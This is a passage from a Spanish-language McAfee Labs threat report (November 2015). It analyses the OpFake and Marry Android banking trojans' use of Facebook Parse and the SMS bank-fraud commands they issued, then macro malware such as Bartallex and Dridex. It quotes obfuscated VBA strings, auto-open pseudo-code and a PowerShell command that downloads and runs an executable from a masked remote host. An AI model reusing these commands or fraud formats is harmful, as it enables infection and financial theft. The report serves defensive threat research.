is_card: si contiene cc # • intype: entrante Se guarda el mensaje en la tabla SmsReceiver Se guarda la respuesta (desde el cuerpo) en TaskManager Se consulta TaskManager por hash de tarea Sí Mensaje SMS recibido Se procesa el mensaje SMS ¿Intercept activada? Sí ¿Es una respuesta a un SMS anterior enviado? imei phone: from message type: entrante Se envían los datos del mensaje al canal de inserción de Parse “I” Fin No No • • • • No ¿El origen contiene 088011 o 000100? Se envía el mensaje a /bn/ save_message.php Sí Se extrae el saldo del cuerpo del mensaje y se guarda Interacción entre Android/OpFake y Facebook Parse cuando se recibe un mensaje SMS. Fuente: https://www.virusbtn.com/pdf/conference_slides/2015/Huber-etal-VB2015.pdf Android/OpFake también comprueba si el SMS es una respuesta a otro SMS enviado con anterioridad mediante la tabla NewTasks. Si es así, el contenido se almacena en el campo "response". Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 22 Temas principales Troyano bancario móvil: tablas de Facebook Parse Con nuestro análisis estático de Android/OpFake descubrimos la finalidad de los datos almacenados en cada tabla de Facebook Parse: Tablas de control de Android/OpFake en Facebook Parse Tabla de Parse Finalidad NewTasks Almacena los nuevos comandos a la espera de que los ejecute cada dispositivo infectado. Una vez ejecutado el comando, el registro se borra. El tipo de tareas y argumentos puede incluir: ■■ ■■ Intercept: activación/desactivación y fecha. ■■ New_server: URL y fecha. ■■ SmsReceiver From: origen del mensaje de texto (número de teléfono/nombre de la empresa). ■■ Intype: entrante/saliente. ■■ To: ID del dispositivo infectado. ■■ ■■ Comparta este informe Install: ID del dispositivo, URL que señala a un archivo APK, nombre del paquete de la nueva aplicación y fecha. Contiene todos los mensajes SMS entrantes interceptados que ha recibido el dispositivo infectado: ■■ TaskManager SMS: origen (ID del dispositivo infectado), destino, contenido, fecha. Is_card: verdadero/falso si el mensaje contiene un número de tarjeta de crédito. Type: "service" si el origen es una empresa (por ejemplo, MegaFon) u "other" si se trata de otro número de teléfono (mensaje personal). Guarda todas las tareas ejecutadas y también su respuesta si el mensaje SMS entrante es la respuesta a una tarea ejecutada con anterioridad (como la solicitud de saldo de una tarjeta de crédito concreta). En total, durante los dos meses que llevó nuestro estudio encontramos cinco cuentas afectadas en Facebook Parse, cuatro de ellas utilizadas por Android/OpFake y una, la cuenta D, utilizada por Android/Marry. En el caso de NewTasks, el análisis estático demostró que, una vez ejecutada la tarea, el registro que ejecuta el comando se borra de la tabla. Al analizar la fecha de creación de los registros de esa tabla, vimos que hasta el 25 de junio no había casi registros de ejecución de comandos, lo que seguramente significa que en ese momento los dispositivos infectados habían ejecutado con éxito todos los comandos creados (o que no se habían creado comandos nuevos). Después del 25 de junio todas las cuentas contenían varios registros, lo que sugiere que ninguno se había ejecutado porque los registros no se habían borrado. Probablemente el malware se había eliminado del dispositivo de la víctima. Nuestro análisis de la fecha de creación de los registros en la tabla NewTasks de Facebook Parse indica que el impacto en las víctimas podría haber sido mayor si los dispositivos infectados hubieran ejecutado todos los comandos pendientes desde el 25 de junio. Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 23 Temas principales Fechas de creación de registros de ejecución de comandos de NewTasks 14 000 12 000 10 000 8000 6000 4000 2000 0 13 15 17 19 21 23 Junio 2015 25 27 29 1 Cuenta A (OpFake) Cuenta B (OpFake) Cuenta D (Marry) Cuenta E (OpFake) 3 5 7 9 11 Julio 2015 13 Cuenta C (OpFake) Fuente: https://www.virusbtn.com/pdf/conference_slides/2015/Huber-etal-VB2015.pdf El comando de NewTasks más utilizado es SMS, ya que se registró 50 000 y 60 000 veces en las cuentas B y E (Android/OpFake), respectivamente. La cuenta D (Android/Marry) contenía pocos registros, quizá porque la mayoría de los dispositivos infectados estaban ejecutando tareas activamente en el momento del análisis: Tipos de comandos en la tabla NewTasks 70 000 60 000 50 000 40 000 30 000 20 000 10 000 0 Cuenta A (OpFake) Cuenta B (OpFake) Todos los comandos SMS Cuenta C (OpFake) Intercept Cuenta D (Marry) New_server Cuenta E (OpFake) Install Fuente: https://www.virusbtn.com/pdf/conference_slides/2015/Huber-etal-VB2015.pdf Comparta este informe Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 24 Temas principales Los datos muestran que miles de comandos seguían todavía pendientes de que los ejecutara Android/OpFake, mientras que Android/Marry logró procesar la mayoría de las tareas. Las cifras también muestran que el objetivo principal de estas dos familias de malware es enviar mensajes SMS para realizar fraudes financieros, como se deduce de los datos obtenidos en la tabla TaskManager. En la tabla NewTasks vimos varios ejemplos de entrega con comandos distintos de SMS e Install: ■■ New_server: ––hxxp://newwelcome00.ru ––hxxp://newelcome00.ru ■■ Install: ––Android/OpFake entrega Android/Marry: ■■ ■■ hxxp://newwelcome00.ru/appru.apk (marry.adobe.net. threadsync). hxxp://newwelcome00.ru/app.apk (marry.adobe.net.nightbuid). ––hxxp://notingen.ru/Player.apk (com.adobe.net) ––hxxp://швждаыдлпждв En la tabla SmsReceiver, la cuenta E (Android/OpFake) fue la más activa, ya que interceptó y robó unos 60 000 mensajes SMS entrantes, seguida de la cuenta B con aproximadamente 41 000 registros: Número de mensajes en la tabla SmsReceiver 70 000 60 000 50 000 40 000 30 000 20 000 10 000 0 Cuenta E (OpFake) Cuenta B (OpFake) Cuenta A (OpFake) Cuenta C (OpFake) Cuenta D (Marry) Fuente: https://www.virusbtn.com/pdf/conference_slides/2015/Huber-etal-VB2015.pdf Los datos muestran que Android/OpFake reunió casi 170 000 mensajes SMS de dispositivos infectados, la mayoría de ellos mensajes personales, porque, como hemos visto antes, las tareas recientes de la tabla NewTasks no se habían podido ejecutar. Esto demuestra que las víctimas no solo se vieron afectadas económicamente, sino que los ciberdelincuentes también invadieron su privacidad. Comparta este informe Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 25 Temas principales Al comprobar el campo is_card de la tabla SmsReceiver, descubrimos la cantidad de números de tarjetas de crédito robados con mensajes SMS entrantes durante los dos meses del estudio: Cantidad de números de tarjetas de crédito robados (durante el período de estudio de dos meses) 140 120 100 80 60 40 20 0 Cuenta D (Marry) Cuenta E (OpFake) Cuenta B (OpFake) Cuenta A (OpFake) Cuenta C (OpFake) Fuente: https://www.virusbtn.com/pdf/conference_slides/2015/Huber-etal-VB2015.pdf En cuanto a las fechas en las que se interceptaron los mensajes SMS, todas las cuentas registraron su máxima actividad entre el 16 y el 24 de junio: Fechas de creación de registros de ejecución de comandos SmsReceiver 16 000 14 000 12 000 10 000 8000 6000 4000 2000 0 8 10 12 14 16 18 20 22 24 26 28 30 Junio 2015 Cuenta A (OpFake) Cuenta B (OpFake) Cuenta D (Marry) Cuenta E (OpFake) 2 4 6 8 10 12 14 16 Julio 2015 Cuenta C (OpFake) Fuente: https://www.virusbtn.com/pdf/conference_slides/2015/Huber-etal-VB2015.pdf Comparta este informe Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 26 Temas principales En la tabla TaskManager, que contiene las tareas ejecutadas y la respuesta correspondiente (de haberla), la cuenta D (Android/Marry) fue de lejos la de mayor éxito en la ejecución de tareas: Tipos de comandos en la tabla TaskManager 21 000 18 000 15 000 12 000 9000 6000 3000 0 Cuenta A (OpFake) Solicitudes Cuenta B (OpFake) Respuestas Cuenta C (OpFake) SMS Cuenta D (Marry) Intercept Cuenta E (OpFake) Install Fuente: https://www.virusbtn.com/pdf/conference_slides/2015/Huber-etal-VB2015.pdf Combinado con los datos hallados en NewTasks, el gráfico anterior confirma que Android/Marry estaba muy activo en el momento en que accedimos a las cuentas afectadas y que se ejecutaron con éxito más de 20 000 comandos, la mayoría de ellos tareas SMS principalmente orientadas al fraude financiero. Siendo Android/Marry la familia de malware que logró ejecutar el mayor número de tareas (debido al número de registros de la tabla TaskManager), concentramos nuestro análisis en los comandos ejecutados de la cuenta D y sus respuestas. Al examinar el destino de las tareas SMS, identificamos las empresas que Android/Marry atacó con más frecuencia (cuenta D): Comparta este informe Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 27 Temas principales Número de solicitudes por SMS por compañía atacada (durante el período de estudio de dos meses) 5500 5000 4500 4000 3500 3000 2500 2000 1500 1000 500 0 Banco 5335 Banco 100 Banco 79037672265 Banco 159 Banco 3116 Banco 7878 Banco 6996 Banco 7494 Banco 10060 Banco 900 Fuente: https://www.virusbtn.com/pdf/conference_slides/2015/Huber-etal-VB2015.pdf En el caso de un importante banco de Europa oriental, se enviaron 5350 mensajes SMS al número 900 de la organización. Los mensajes SMS realizaron estas transacciones financieras: Comparta este informe Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 28 Temas principales Comandos hallados en la tabla TaskManager Comando Formato Respuesta BALANCE/ BALANS/баланс (Saldo) BALANS <4-últimosdígitos> VISA1234 Balance: <importe> INFO/СПРАВКА (Información) СПРАВКА Lista de tarjetas conectadas: VISA1234(ON); ПЕРЕВОД/ PEREVOD/ ПЕРЕВЕСТИ (Transferir) ПЕРЕВОД <4dígitos_ origen_tarjeta> <4dígitos_destino_ tarjeta> o <número_ teléfono_destino> <importe> Para transferir <importe> de la tarjeta VISA1234, el titular <nombre> debe enviar el código <código> al número 900. ZAPROS (Solicitar) ZAPROS <número_ teléfono> <importe> Se ha enviado la solicitud de una transferencia de <importe> a su tarjeta VISA5678. El dinero se abonará en su cuenta tras la confirmación del ordenante <nombre>. TEL/PLATEZ/ PHONE/ POPOLNI/PLATI (Cuenta de pago del móvil) TEL <número_teléfono> <importe> Para pagar con la tarjeta VISA1234 el importe <importe> del teléfono <número_teléfono> de <empresa>, envíe el código <código> al número 900. Fuente: https://www.virusbtn.com/pdf/conference_slides/2015/Huber-etal-VB2015.pdf Normalmente, la transacción financiera fraudulenta comienza cuando se envía INFO al número 900 (mediante la tabla NewTasks) para obtener una lista de tarjetas conectadas. Si se obtiene una respuesta y la víctima tiene una o varias tarjetas de crédito activadas para transacciones por SMS (por ejemplo, VISA1234 (ON)), el ciberdelincuente comprueba el saldo de cada tarjeta. Si hay dinero disponible, se inicia una transacción fraudulenta para transferir dinero a otra tarjeta o cliente o para pagar una cuenta de telefonía móvil creando un registro en NewTasks con destino 900 y las palabras Transferir (en ruso) o TEL/PLATI. Como medida de seguridad, el banco responde con un código que el usuario debe enviar para confirmar la transacción. El ciberdelincuente comprueba la tabla TaskManager para obtener el código y crea en NewTasks un nuevo registro de ejecución de comando para enviar el código de confirmación al número 900. En el caso de ZAPROS (Solicitar), el ciberdelincuente solicita la transferencia de un importe a un número de teléfono que puede ser otro dispositivo infectado. Si la otra víctima confirma la transacción, el dinero se transfiere al ciberdelincuente. Como la solicitud BALANCE se realiza por cada tarjeta de crédito, fue sin duda la solicitud más frecuente durante los dos meses del estudio. Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 29 Temas principales Números de solicitudes por comando de banca (durante el período de estudio de dos meses) 5000 4000 3000 2000 1000 0 BALANCE/ BALANS/ /баланс (Saldo) INFO/ СПРАВКА (Información) ПЕРЕВОД/ PEREVOD/ ПЕРЕВЕСТИ (Transferencia) ZAPROS (Solicitud) TEL/PLATEZ/ PHONE/ POPOLNI/PLATI (Cuenta de pago del móvil) Fuente: https://www.virusbtn.com/pdf/conference_slides/2015/Huber-etal-VB2015.pdf Estos son los tipos de respuestas del banco afectado que encontramos en la cuenta D: Respuestas enviadas por el banco afectado halladas en la tabla TaskManager Tipo Respuesta Saldo Saldo VISA1234: <importe> Información Lista de tarjetas conectadas: VISA1234(ON); Teléfono solicitado Para pagar con la tarjeta VISA1234 el importe <importe> del teléfono <número_teléfono> de <empresa>, envíe el código <código> al número 900. Teléfono procesado Pago el <fecha> <hora> con VISA1234 por <importe> por los servicios de <operador> <número_teléfono>. Saldo: <importe> Transferencia procesada MAES1234: Se ha procesado la transferencia de <importe> al titular de la tarjeta <nombre> Transferencia aceptada VISA1234: <hora> Se ha recibido el importe <importe> del ordenante <nombre>. Saldo: <importe> Transferencia solicitada Para transferir el importe <importe> de la tarjeta VISA1234, el titular de la tarjeta <nombre> debe enviar el código <código> al número 900. Fuente: https://www.virusbtn.com/pdf/conference_slides/2015/Huber-etal-VB2015.pdf Comparta este informe Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 30 Temas principales Vamos a agrupar el tipo de respuestas por categoría: ■■ ■■ ■■ Saldo/Información: contiene información general, como las tarjetas de crédito vinculadas a una cuenta bancaria, cuáles están activas y su saldo actual. Transferencia solicitada: las respuestas incluyen códigos de confirmación que el usuario debe enviar para finalizar las transacciones. Transferencia procesada: contiene las transacciones fraudulentas confirmadas. Número de respuestas de bancos atacados encontradas en la tabla TaskManager (durante el período de estudio de dos meses) 700 600 500 400 300 200 100 0 Saldo Información Teléfono solicitado Teléfono procesado Transferencia Transferencia Transferencia procesada aceptada solicitada Fuente: https://www.virusbtn.com/pdf/conference_slides/2015/Huber-etal-VB2015.pdf Aquí también Saldo es la respuesta más frecuente, ya que se obtuvo con éxito el saldo de 607 tarjetas de crédito, seguida de Información, que proporciona la lista de tarjetas de crédito conectadas pertenecientes a 123 cuentas bancarias. En total, durante junio y julio se realizaron 141 transacciones fraudulentas (Pagar teléfono y Transferir). Comparta este informe Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 31 Temas principales Número de usuarios afectados por troyanos bancarios móviles Como cada registro tiene un identificador de dispositivo único (IMEI o android_id), pudimos hacer el recuento del número de víctimas afectadas por tabla y por cuenta. Observamos que, a juzgar por la cifra de identificadores de dispositivo únicos de la tabla TaskManager (tareas ejecutadas), el número de usuarios afectados podía haber sido mucho mayor que el real si los dispositivos infectados hubieran ejecutado el contenido de la tabla NewTasks. Por otro lado, vimos que Android/OpFake (cuentas A, B, C y E) fue más eficaz interceptando mensajes SMS, mientras que Android/Marry afectó a más usuarios realizando transacciones fraudulentas a través de mensajes SMS. Durante los dos meses de datos que analizamos, estos dos troyanos bancarios móviles afectaron a miles de usuarios, la mayoría situados en Europa oriental. Número de usuarios afectados por tabla (durante el período de estudio de dos meses) 9000 8000 7000 6000 5000 4000 3000 2000 1000 0 Cuenta A (OpFake) Cuenta B (OpFake) NewTasks SmsReceiver Cuenta C (OpFake) Cuenta D (Marry) Cuenta E (OpFake) TaskManager Fuente: https://www.virusbtn.com/pdf/conference_slides/2015/Huber-etal-VB2015.pdf Divulgación responsable El 3 de agosto, Rasthofer y Bodden notificaron estos resultados a Facebook. El 6 de agosto, Facebook bloqueó todas las cuentas de Facebook Parse afectadas que habían utilizado estos dos troyanos bancarios móviles. Este estudio demuestra que los troyanos bancarios móviles son una amenaza real que afecta a miles de usuarios y a numerosas empresas, especialmente en Europa oriental, donde el fraude financiero con mensajes SMS es muy activo mediante aplicaciones móviles maliciosas. Comparta este informe Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 32 Temas principales Nuestro análisis también indica que las transacciones fraudulentas afectaron a cientos de usuarios durante los dos meses del estudio. Finalmente, demuestra que los creadores de malware actúan como cualquier desarrollador legítimo, en el sentido de que a menudo se centran en la funcionalidad de la aplicación y no en la seguridad de los datos que recopila o utiliza el malware. Si los agresores hubieran codificado el malware con prácticas de seguridad sólidas, este análisis no habría sido posible. Protección En el caso de las aplicaciones móviles legítimas, para los usuarios es difícil saber si estas utilizan servicios BaaS y, en tal caso, si se han implementado correctamente las directrices de seguridad para BaaS. Para reducir la exposición de los datos personales en soluciones BaaS, McAfee Labs recomienda que los usuarios se limiten a utilizar aplicaciones móviles bien conocidas cuya seguridad haya validado un tercero de confianza. En el caso de los troyanos bancarios móviles, como hemos visto en los datos obtenidos de las cuentas de Facebook Parse afectadas, los dispositivos infectados se emplean para distribuir malware con ataques de phishing que envían mensajes SMS con el texto "Tiene 1 mensaje no leído". Intel Security recomienda descargar aplicaciones móviles únicamente en tiendas reconocidas como Google Play y evitar las que proceden de fuentes desconocidas, incluidos los mensajes SMS y de correo electrónico. También recomienda que los usuarios de dispositivos móviles se abstengan de obtener acceso root en sus dispositivos (o, si es preciso, que lo hagan después de las tareas que requieran privilegios de administrador), porque el malware móvil a menudo aprovecha el acceso privilegiado para instalar aplicaciones inadvertidamente sin el consentimiento del usuario. Por último, para proteger los dispositivos frente a estas amenazas, recomendamos instalar una solución de seguridad móvil. Comparta este informe Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 33 Temas principales El regreso del malware basado en macros —Diwakar Dinkar y Rakesh Sharma ¿Recuerda el malware basado en macros? En la década de los 90, hasta que Microsoft tomó las medidas necesarias para reducir su eficacia, había amenazas como Melissa y WM.Concept que conseguían sus objetivos. Ahora, tras varios años de decadencia, se observa un repunte de las macros maliciosas. Aunque los usuarios particulares no se ven muy afectados por esta amenaza, ya que hacen un uso mínimo de las macros, las organizaciones de mayor tamaño sí las emplean con frecuencia, ya que son programas fáciles de desarrollar y útiles para las tareas repetitivas. Los desarrolladores de malware basado en macros emplean técnicas de ingeniería social para que los usuarios de empresas desprevenidos caigan en la trampa. Cómo funcionan las macros Una macro es un método rápido para automatizar una tarea que se realiza con frecuencia. Se trata de código incrustado en un documento que, en el caso de los archivos Microsoft Office, normalmente se escribe en el lenguaje de programación Visual Basic para aplicaciones. Grabar una macro es escribir un programa mediante el empleo de un potente lenguaje de programación. Una macro se puede ejecutar automáticamente cuando el usuario realiza una operación, como iniciar Microsoft Word o abrir un documento. Word reconoce los siguientes nombres como macros automáticas o macros "auto": ■■ AutoExec: se inicia cuando se carga Word o la plantilla global. ■■ AutoNew: se inicia cuando el usuario crea un nuevo documento. ■■ AutoOpen: se inicia cuando el usuario abre un documento. ■■ AutoClose: se inicia cuando el usuario cierra un documento. ■■ AutoExit: se inicia cuando se cierra Word o la plantilla global. Las macros permiten al usuario ahorrar tiempo en tareas sencillas, sin embargo los autores de malware pueden escribir código malicioso en su interior. El malware basado en macros afecta a cualquier producto que permita a los usuarios escribir secuencias de comandos de macro. Debido a su popularidad, el producto con más malware para macros es Microsoft Word. El malware se propaga fácilmente a través de los documentos Word, ya que estos contienen texto y macros. Esta combinación de texto y macros mejora el control y ofrece más comodidad al usuario, pero al mismo tiempo abre la puerta al malware basado en macros. Las mismas ventajas y riesgos se aplican a los archivos Excel, en los que los datos y las macros asociadas se encuentran en el mismo libro de trabajo. Cuando Microsoft reconoció el alcance de la amenaza, cambió la configuración predeterminada de Office de manera que no permitiera la ejecución de macros, y de esta forma proteger a la mayoría de los usuarios. Pero muchas de las grandes empresas sí utilizan macros y, por lo tanto, dejan la puerta abierta. Los autores de malware han aprovechado esta oportunidad, y el malware para macros ha vuelto mediante el empleo de sencillos trucos de ingeniería social. Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 34 Temas principales Una breve historia del malware basado en macros En los años 90, el malware para macros, como los virus WM.Concept y Melissa, infectó a millones de usuarios de Microsoft Office. ■■ ■■ WM.Concept: el primer virus de macro que se propagaba a través de Word apareció en 1995. Era la primera vez que los virus podían residir en documentos de procesamiento de texto y hojas de cálculo comunes. Melissa: este virus de macro de envío masivo fue descubierto por McAfee Labs en 1999. Melissa se propaga a través de un documento Word como archivo adjunto del correo electrónico con un breve texto que indica a los usuarios que abran y lean el adjunto. Al abrir el documento Word, se ejecuta el virus. Melissa comprueba si están instalados Word 97 o 2000. Desactiva algunas funciones del software, como el aviso de ejecución de una macro la próxima vez que se abra el documento en Word 2000. Infecta otros documentos Word 97 y Word 2000 mediante la adición de una nueva macro denominada Melissa. Se propaga mediante el envío de copias del documento infectado hasta a 50 direcciones de correo electrónico, utilizando versiones compatibles de Outlook. Si el equipo infectado no tiene Outlook o una conexión a Internet, el virus sigue propagándose localmente. Se cree que este virus ha infectado hasta a un 20 % de los ordenadores del mundo y ha sido el de más rápida propagación hasta el momento. Para luchar contra el malware basado en macros, Microsoft generó un paso que requería permisos para activar las macros y que servía como verificación. Ahora Microsoft Office desactiva todas las macros de manera predeterminada, de forma que no es posible ejecutar macros sin el permiso del usuario. Esta iniciativa aplacó el entusiasmo de los desarrolladores de malware basado en macros y redujo la influencia de las macros maliciosas. Vuelve el malware basado en macros A pesar de las mejoras aportadas por Microsoft, en el último año hemos observado el empleo de malware basado en macros para atacar empresas mediante amenazas persistentes. Durante los últimos trimestres el enorme incremento de este tipo de malware pone de manifiesto que los programas de Office vuelven a ser los objetivos más populares. Nuevo malware basado en macros 45 000 Las amenazas basadas en macros para Office están en su nivel máximo en seis años. 40 000 35 000 30 000 25 000 20 000 15 000 10 000 5000 0 T4 2013 T1 T2 2014 T3 T4 T1 T2 2015 T3 El enorme repunte de las muestras enviadas a McAfee Labs demuestra que el malware basado en macros vuelve a aumentar. Comparta este informe Fuente: McAfee Labs, 2015 Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 35 Temas principales Ataques de malware basado en macros por región 1 %1 % Norteamérica 12 % Europa Asia 13 % 44 % América Central Oceanía 29 % África América del Sur Los ataques de malware basados en macros son más prevalentes en Norteamérica, seguidos por el norte de Europa. Fuente: McAfee Labs, 2015 Cadena de infección El malware basado en macros se propaga principalmente a través de adjuntos de correo spam: mediante el empleo de distintas campañas de spam, páginas web atacadas y descargas secundarias. El mecanismo de distribución ha evolucionado: al principio, las campañas de spam duraban días y semanas, y utilizaban el mismo asunto de correo electrónico o nombre de adjunto. Este uso sistemático ayudaba a los proveedores de seguridad a detectar y mitigar rápidamente las amenazas. Sin embargo, ahora las campañas de spam basado en macros tienen poca duración, los asuntos cambian con frecuencia y los archivos adjuntos han sido diseñados metódicamente con el fin de evitar la detección. Además, las infecciones actuales no suelen ser detectadas, ya que el archivo se comporta como un documento normal, incluso tras realizar su actividad maliciosa. El malware basado en macros en general sirve como punto de entrada para otro malware que consigue llegar al sistema de la víctima y provocar más daños. El diagrama siguiente muestra la cadena de infección típica del malware de macros desde el momento del contacto inicial hasta que deja su carga útil maliciosa. Comparta este informe Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 36 Temas principales Cadena de infección de malware basado en macros El spam contiene un documento de Office con una macro El usuario activa y ejecuta la macro El malware descarga más malware del servidor de control Esta cadena de infección comienza con el mensaje de spam que lleva adjunto el archivo .doc o .zip. El contenido del correo electrónico está adaptado para que resulte atractivo a los usuarios mediante el empleo de técnicas de ingeniería social. Entre las líneas empleadas como asunto del correo electrónico se incluyen algunas como las siguientes, por ejemplo: ■■ Solicitud de pago ■■ Aviso importante sobre transferencia internacional rechazada ■■ Fax-54078429-248035834 ■■ Notificación del servicio de mensajería ■■ Curriculum Vitae ■■ Solicitud de pago de 4478,63 ■■ Factura de Help Desk US ■■ Factura de ventas ■■ Confirmación de donación ■■ Factura alias Hello Si se emplea una línea de asunto eficaz, los usuarios más incautos leerán el mensaje y abrirán el archivo adjunto. Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 37 Temas principales Ejemplos de mensajes que contienen adjuntos maliciosos. Cada vez que un usuario abre un archivo Word malicioso, se muestra un aviso de seguridad que le pregunta si desea activar las macros. Una vez activadas, se ejecuta la macro que contiene el malware. El contenido de los archivos Word maliciosos varía según la familia de amenazas. El usuario puede ver un documento vacío o bien un mensaje que solicita activar las macros para ver el contenido del documento. En algunos casos, el malware elimina el contenido del documento una vez que la macro se ha activado. Comparta este informe Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 38 Temas principales Ejemplos de archivos Word maliciosos. Al activar las macros para abrir un documento malicioso, el usuario permite la ejecución del malware. Tras ejecutar las macros, el malware copia uno o varios archivos .bat, .vbs o .ps (PowerShell) en el sistema de la víctima, según si la familia de malware es Bartallex, Dridex, Donoff u otro downloader. Estos archivos descargarán a su vez otro malware, como Upatre, Vawtrak, Chanitor o Zbot. McAfee Labs ha observado últimamente macros que descargan amenazas para sistemas de puntos de venta y ransomware. Ocultación del malware basado en macros En nuestro análisis hemos descubierto mucho código basura en las secuencias de comandos de las macros, así como API falsas en los ejecutables. El objetivo del código basura es evitar que funcionen las técnicas de ingeniería inversa y detección. Se insertan líneas de código varias veces para complicar las investigaciones y ocultar la intención maliciosa. Comparta este informe Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 39 Temas principales Los desarrolladores de malware para macros añaden código basura para intentar complicar la ingeniería inversa. Este tipo de ocultación de código es eficaz. Hemos observado muchos casos en los que no solo se incluían cadenas maliciosas, sino también datos basura con el objeto de crear confusión. Los agresores suelen ocultar el código de las macros mediante el empleo de funciones irrelevantes que van desde conversores de caracteres, como Chr() y ChrW(), hasta las de cifrado complejo personalizado. Este ejemplo muestra cómo se utiliza una función de conversión de caracteres para reconstruir la URL maliciosa con el fin de descargar la carga útil final. Comparta este informe Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 40 Temas principales Ejecución de macros Un documento malicioso puede comenzar con la macro Auto_Open(), que se ejecuta automáticamente cada vez que se abre el documento. A continuación, Auto_Open() invoca el método principal. Las macros también puede contener controladores de eventos de Microsoft Office, como AutoOpen() y Workbook_Open(). Estos controladores invocarán Auto_Open(), que a su vez activará el método principal que descarga la carga útil en el sistema de la víctima. Gracias a la aplicación de las tres macros —Auto_Open(), AutoOpen() y Workbook_Open()— en un documento, los agresores reducen el riesgo de fallo de la ejecución maliciosa. Func AutoOpen() Auto_Open End Func Func Workbook_Open Auto_Open End Func Func Auto_Open() Main_Func End Func Func Main_Func() Descifrar la URL Descifrar la ruta del archivo End Func Func Download (URL, PATH) Descargar la carga útil final End Func Los agresores suelen utilizar macros redundantes para garantizar que funcionen. Cuando se ejecuta el malware malicioso, se crea un objeto XMLHTTP para intercambiar datos con el servidor. Este envía de manera continua una solicitud de conexión al servidor utilizando HTTP Send() hasta que obtiene una respuesta. Una vez que se establece la conexión con la URL descifrada, se descarga la carga útil final y se guarda en la ruta especificada en el sistema de la víctima. Por último, se ejecuta el binario descargado mediante un comando Shell(). Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 41 Temas principales Instancia de objeto XMLHTTP creada Preparación de cuerpo de solicitud HTTP Send() No readyState==4? Sí Variable= Respuesta (archivo cargado) Guardar contenido en ubicación especificada Ejecutar archivo cargado con Shell() Este organigrama muestra la rutina de distribución de la carga útil del malware. Comportamiento de Bartallex Vamos a examinar el comportamiento de Bartallex, que contiene tres macros maliciosas incrustadas. Detalles de la extracción de macros en Bartallex. Las dos primeras líneas utilizan métodos de ocultación clásicos. ■■ ■■ BART212 = "" & "d-up" + "date" BART2 = Chr(97) + Chr(100) & "" & "o" & "" & "b" & "e" + "ac" & BART212 Es habitual dividir una variable para evitar ser detectado por los analizadores que buscan palabras clave y otras actividades sospechosas, como descargas de archivos. La función Chr devuelve una cadena que contiene el carácter asociado al código de carácter especificado. Por ejemplo, Chr(97) es la letra a y Chr(100) es la letra d. Comparta este informe Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 42 Temas principales Tras eliminar los espacios y realizar las sustituciones correspondientes, obtenemos una cadena con sentido: BART2 = "adobeacd-update". Otra variante de Bartallex emplea otro mecanismo de ocultación diferente para burlar a los investigadores de seguridad. Al abrir el archivo del documento con las macros activadas, se ejecuta el archivo de proceso por lotes copiado, que a su vez ejecuta el archivo .vbs, que descarga inmediatamente otro malware —como Upatre, Vawtrak y Chanitor— del servidor remoto. (Aquí encontrará más información sobre Bartallex). Malware que se conecta al servidor de control http:/xx.xxx.254.213 para descargar la carga útil, que parece ser un archivo .jpg pero en realidad es un archivo ejecutable malicioso. Comparta este informe Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 43 Temas principales Comportamiento de Dridex En el caso de Dridex, el documento adjunto puede llegar en una de esta dos variantes: ■■ La primera llega como un documento XML (.xml o .doc) que contiene un objeto de Office cifrado mediante Base64, que se descifra y ejecuta al abrir el archivo XML. El objeto ActiveMime incrustado contiene un documento OLE cifrado que se descifra y ejecuta justo después de que el archivo XML abra el objeto de Office. A continuación, el archivo OLE ejecuta una macro incrustada que contiene código similar al que vemos en la siguiente imagen: Este código ejecuta PowerShell y descarga Dridex. ■■ La segunda variante llega como archivo Word o Excel que contiene un objeto activo de Office que ejecuta el código malicioso en el archivo OLE como código OLE nativo. Los autores de malware basado en macros saben bien lo que hacen; incluso aunque el usuario no haya activado la ejecución de las macros, el malware puede ejecutarse lanzando el código malicioso directamente desde el archivo OLE. Para engañar al usuario, el malware presenta un archivo de documento con un objeto activo incrustado. Comparta este informe Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 44 Temas principales Los usuarios reciben una advertencia sobre la apertura de objetos activos maliciosos, parecida a la que aparece cuando intentan abrir un documento que contiene una macro incrustada. Si está desprevenido, el usuario puede abrir el objeto activo incrustado ignorando la advertencia y hacer doble clic en el objeto malicioso. En este caso, el código de descarga (downloader) se procesará mediante la ejecución de una instancia de PowerShell, como en la variante anterior. En cualquiera de los casos, el código malicioso incrustado ejecutará una instrucción de línea de comandos que iniciará powershell.exe con los siguientes parámetros: ■■ cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (NewObject System.Net.WebClient).DownloadFile('hxxp:// 62.xx.xx.15 / asalt/assa.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\ JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\ JIOiodfhioIH.exe; Comparta este informe Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 45 Temas principales El código anterior solo se ejecutará si PowerShell está instalado. Tras ejecutar este código, el malware descarga y ejecuta el cargador Dridex, que descarga e instala la DLL de Dridex, que se inyecta en explorer.exe mediante la ejecución del siguiente comando: ■■ rundll32.exe "C:\XX.tmp" NotifierInit Tras ejecutar este comando, se instala en el sistema el propio Dridex, se termina rundll.exe y el sistema queda infectado. A continuación, el malware se pone en contacto con el servidor, o los servidores, de control para comunicar la infección. Dridex es un malware "bancario" que puede robar credenciales de usuario para las cuentas online; procede de Cridex. Los dos forman parte de la familia de malware GameOver Zeus. (Aquí encontrará más información sobre Dridex). Hace poco, McAfee ha observado también ataques basados en macros que propagan el malware de punto de venta Evoltin, que roba el nombre del PC, la GUID y otros datos relacionados, y los transmite a través de HTTP Post al servidor remoto. 